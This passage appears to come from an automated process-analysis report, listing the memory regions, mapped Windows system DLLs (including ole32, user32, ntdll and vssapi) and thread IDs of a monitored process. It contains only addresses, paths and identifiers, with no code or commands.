entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1369 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1370 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1371 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1372 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1373 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1374 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1375 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1376 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1377 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1378 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1379 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1380 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1381 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1382 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1383 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1384 start_va = 0x130000 end_va = 0x137fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1385 start_va = 0xab0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 1386 start_va = 0x6dc30000 end_va = 0x6dd45fff monitored = 0 entry_point = 0x6dc31590 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Thread: id = 94 os_tid = 0xa84 Thread: id = 95 os_tid = 0xa74 Thread: id = 96 os_tid = 0xa90 Thread: id = 97 os_tid = 0xa88 Thread: id = 98 os_tid = 0xa80 Thread: id = 99 os_tid = 0xa78 Thread: id = 103 os_tid = 0xaf4 Thread: id = 116 os_tid = 0xdcc